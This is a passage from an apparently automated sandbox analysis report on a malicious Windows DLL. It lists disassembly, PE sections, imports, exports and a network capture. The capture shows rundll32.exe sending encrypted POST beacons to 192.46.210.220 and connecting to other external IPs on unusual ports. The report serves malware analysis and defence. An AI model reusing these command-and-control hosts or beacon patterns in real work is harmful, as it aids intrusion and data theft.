                                                                                                        pop ebp
                                                                                                        ret
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        int3
                                                                                                        push ebp
                                                                                                        mov ebp, esp
                                                                                                        sub esp, 18h
                                                                                                        mov eax, dword ptr [ebp+00h]

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x1471900x6c.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1471fc0x28.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x15c0000x72b4.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x1431100x54.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1431680x40.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0xc70000x184.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000xc5e2f0xc6000False0.442065922901data6.47812636882IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0xc70000x80aec0x80c00False0.534103837985data5.52053058147IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0x1480000x13ba00x1800False0.1875DOS executable (block device driverpyright)3.99635070896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x15c0000x72b40x7400False0.710264008621data6.69742088731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        KERNEL32.dllGetCurrentDirectoryA, GetTempPathA, GetWindowsDirectoryA, VirtualProtectEx, FindFirstChangeNotificationA, FlushFileBuffers, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, FreeLibrary, LoadLibraryExW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, ExitProcess, GetStdHandle, GetFileType, WriteFile, OutputDebugStringA, OutputDebugStringW, WriteConsoleW, CloseHandle, WaitForSingleObjectEx, CreateThread, SetConsoleCtrlHandler, GetCurrentThread, GetDateFormatW, GetTimeFormatW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, GetACP, GetProcessHeap, GetTimeZoneInformation, FindClose, FindFirstFileExA, FindFirstFileExW, FindNextFileA, FindNextFileW, IsValidCodePage, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetEnvironmentVariableW, SetStdHandle, GetConsoleCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                        Exports

                                                                                                        NameOrdinalAddress
                                                                                                        Bluewing10x49eed0
                                                                                                        Earth20x49efd0
                                                                                                        Masterjust30x49eb20

                                                                                                        Network Behavior

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 28, 2021 04:50:53.132839918 CEST49748443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:53.132898092 CEST44349748192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:53.132992983 CEST49748443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:53.611660957 CEST49748443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:53.611677885 CEST44349748192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:54.113028049 CEST44349748192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:54.113159895 CEST49748443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:54.698976040 CEST49748443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:54.699004889 CEST44349748192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:54.699304104 CEST44349748192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:54.699369907 CEST49748443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:54.704368114 CEST49748443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:54.704484940 CEST49748443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:54.704530954 CEST44349748192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:55.400660992 CEST44349748192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:55.400758982 CEST49748443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:55.400779963 CEST44349748192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:55.400801897 CEST44349748192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:55.400839090 CEST49748443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:55.400867939 CEST49748443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:55.420069933 CEST49748443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:55.420104980 CEST44349748192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:55.583523035 CEST49749808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:50:55.742544889 CEST80849749143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:50:55.742635965 CEST49749808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:50:55.743609905 CEST49749808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:50:55.902653933 CEST80849749143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:50:55.904530048 CEST80849749143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:50:55.904598951 CEST49749808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:50:58.124793053 CEST49749808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:50:58.284044981 CEST80849749143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:50:58.284946918 CEST80849749143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:50:58.285027981 CEST49749808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:50:58.285758018 CEST49749808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:50:58.285861015 CEST49749808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:50:58.447355032 CEST80849749143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:50:58.447385073 CEST80849749143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:50:58.447402000 CEST80849749143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:50:58.826340914 CEST80849749143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:50:58.826365948 CEST80849749143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:50:58.826469898 CEST49749808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:50:58.826508045 CEST49749808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:50:58.836498022 CEST49749808192.168.2.5143.244.140.214
                                                                                                        Oct 28, 2021 04:50:58.995783091 CEST80849749143.244.140.214192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.050050020 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:59.050092936 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.050178051 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:59.057816029 CEST497546891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:50:59.088453054 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:59.088469028 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.223125935 CEST68914975445.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.223294973 CEST497546891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:50:59.224311113 CEST497546891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:50:59.389524937 CEST68914975445.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.391211987 CEST68914975445.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.391293049 CEST497546891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:50:59.405404091 CEST497546891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:50:59.570940018 CEST68914975445.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.571019888 CEST497546891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:50:59.571580887 CEST497546891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:50:59.571760893 CEST497546891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:50:59.583471060 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.583657026 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:59.736922979 CEST68914975445.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.736958027 CEST68914975445.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.736978054 CEST68914975445.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.841114998 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:59.841133118 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.841514111 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:50:59.841562986 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:59.867501020 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:59.867614031 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:50:59.867650032 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.120742083 CEST68914975445.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.120780945 CEST68914975445.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.120882988 CEST497546891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:51:00.120935917 CEST497546891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:51:00.256504059 CEST497546891192.168.2.545.77.0.96
                                                                                                        Oct 28, 2021 04:51:00.402481079 CEST497578116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:51:00.421737909 CEST68914975445.77.0.96192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.455048084 CEST811649757185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.455142975 CEST497578116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:51:00.457473993 CEST497578116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:51:00.510821104 CEST811649757185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.518872023 CEST811649757185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.518901110 CEST811649757185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.518953085 CEST497578116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:51:00.518976927 CEST497578116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:51:00.525098085 CEST497578116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:51:00.561952114 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.562041044 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:51:00.562055111 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.562076092 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.562103987 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:51:00.562143087 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:51:00.580276966 CEST811649757185.56.219.47192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.580378056 CEST497578116192.168.2.5185.56.219.47
                                                                                                        Oct 28, 2021 04:51:00.632910013 CEST49753443192.168.2.5192.46.210.220
                                                                                                        Oct 28, 2021 04:51:00.632945061 CEST44349753192.46.210.220192.168.2.5
                                                                                                        Oct 28, 2021 04:51:00.635210037 CEST497578116192.168.2.5185.56.219.47

                                                                                                        HTTP Request Dependency Graph

                                                                                                        • 192.46.210.220

                                                                                                        HTTPS Proxied Packets

                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        0192.168.2.549748192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:50:54 UTC0OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:50:54 UTC0OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:50:55 UTC4INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:50:55 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        1192.168.2.549753192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:50:59 UTC4OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:50:59 UTC5OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:00 UTC9INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:00 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        10192.168.2.549790192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:17 UTC49OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:17 UTC49OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:18 UTC54INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:18 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        11192.168.2.549797192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:21 UTC54OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:21 UTC54OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:22 UTC64INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:22 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        12192.168.2.549798192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:22 UTC59OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:22 UTC59OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:22 UTC64INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:22 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        13192.168.2.549805192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:25 UTC64OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:25 UTC64OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:26 UTC74INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:26 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        14192.168.2.549806192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:25 UTC69OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:25 UTC69OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
